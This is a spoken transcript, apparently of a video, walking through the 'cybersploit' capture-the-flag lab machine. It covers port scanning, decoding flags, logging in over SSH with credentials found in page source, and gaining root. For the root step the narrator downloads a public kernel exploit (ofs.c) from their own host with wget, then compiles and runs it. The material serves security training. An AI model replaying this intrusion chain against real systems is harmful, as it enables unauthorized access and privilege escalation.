Okay, hi everyone. Welcome to another machine. Today we're looking at cybersploit. Okay, so as usual, we start with the host discovery stage. That will enable us to identify the IP address. Once we figure out the IP address, in this case, we move to the port scanning techniques. As usual, we always go for the comprehensive scan, scan all the available ports as well. Yep, the scan didn't last long. The only interesting port here is port 80. So straight away we jump to on port 80, try to look at the directories. At the same time, I will go and use Go Buster to look at some of the directories. Sorry, it seems that I typed the wrong IP address. It's 54. And here we have robot.txt. This might be interesting file. Okay, let's look at the source code. There's nothing. We have some data here that might be interesting to decode. Also, I have something called hacker. Seems that this is an image. Okay. What we can do, we can try to crack this code. It seems to me it's base 64. So what we can do quickly is we can do something like that. And see if it's base 64. Okay. So yes, that's flag one says cybersploit youtube.com see cybersploit. That's interesting. Um, let's look if there is anything else. Let's go and look at the index itself. Look at the source code. Okay, I see something here. So let me copy this. Let's save it here. And also let's go there, and that output that we produced from the shell, let me also save it. It might be useful at a later stage. Okay, so what I would do now, um, what I have here seems to me like a username. Probably this might be a password. So what I will do, I will try to use this combination of username and password and try to access the SSH server and see if that works. So let me open a new window here. SSH. The username I found was it is Sky or SKV. Yep, at 54. Let's use this initially as a password and see if that works. Hit enter. Nothing here new. Okay. Good. We have this was the right credential. So let's look inside. I cannot find any interesting things. Probably we could look at the bash history. Sometimes they might pseudo cybersploit. Okay. So most likely it seems to me that there are other flags we need to look at, and cybersploit most likely is a username. Let's confirm that yes, cybersploit is another username. So let's see if I can look inside the home of cybersploit. So, oh, sorry, ls. Let's cd cd cyber exploit and s dash all. Again, I cannot find anything interesting. Again, I can open the bash.history. Access denied. That's pointing. Let's go one step backward. Go to the home directory of my user again. Okay. Oh, okay. There is a flag too. Let's see what is flag two. Sorry, flag2.txt says. Sounds to me like a binary code. Okay, we can go ahead and try to crack it using CyberChef, for example. From binary. Okay, so that is flag number 2. Really interesting. Again, let's keep it. I don't know if it will be of any use later on. Good. Okay, is there anything else we have here? No, I cannot see anything interesting. So what I would do then also now, I will move on and try to see if there is any um, files with SUID enabled or files with .exe. So I'm just looking at my cheat sheet. So here I'm going to search for file with full access, right? If there's any. And also I'm going to search for, there's nothing. I'm going to search with anything with setuid. Okay, so I have hping, password change, rpng, che, sudo. There isn't anything particularly interesting. These are very standard. Okay. Okay, what we can do also, let me see if I can find, for example, search for words with password inside them. Might be useful. There's nothing. Okay. So the other option I have is to look at the kernel, uname-a, fabulous, lsp release-a. Good. So I know that I'm dealing with Ubuntu 12, and I know that the kernel is 3.13. So quick Googling here. Ubuntu 12.5 LTS. And we said the kernel was 3.3 generic, or sorry, 3.13 generic. Let's see if there's any exploit available. Okay, there is one here. That seems to be working from point 3.13 to 3.19. Uname-gcc. Okay, fair enough. So what I will do now is I will go ahead, copy this. I will put it in here, nano. Let's call it exploit or exp.c. I'll probably give it a proper name. What do they call it here? They call it ofs.c. Okay, let's stick with that then. ofs.c. I'm happy with that. Save it. Start the server. Move to the temporary directory. wget http 192.168.0.18 ofs.c. It is in there now. I can see it here. GCC it. Let's look at the manual or the exploit itself. Yes, you just normal GCC it without any other option. So GCC ofs.c dash o into the OFS. Fabulous. Now I should have it. Yes, I do have it. And just run it. Fabulous. Now I have a root access. And I have the final flag. Final flag. Again, typo root final flag.txt. Fabulous. And that is how we get access to this machine, cybersploit, and we escalate our privileges. Okay, hope that you enjoyed it. See you in another videos.